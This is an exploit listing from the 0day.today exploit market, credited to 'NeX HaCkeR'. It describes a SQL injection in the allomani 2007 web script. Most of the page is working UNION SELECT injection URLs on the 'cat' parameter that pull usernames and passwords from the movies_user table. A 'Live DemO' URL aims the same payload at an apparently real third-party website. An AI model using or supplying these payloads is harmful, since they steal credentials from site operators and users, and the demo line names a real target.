[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

allomani 2007 (cat) Remote SQL Injection Vulnerability

Author
NeX HaCkeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5703
Category
web applications
Date add
25-08-2009
Platform
unsorted
======================================================
allomani 2007 (cat) Remote SQL Injection Vulnerability
======================================================


==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user




#  0day.today [2024-11-16]  #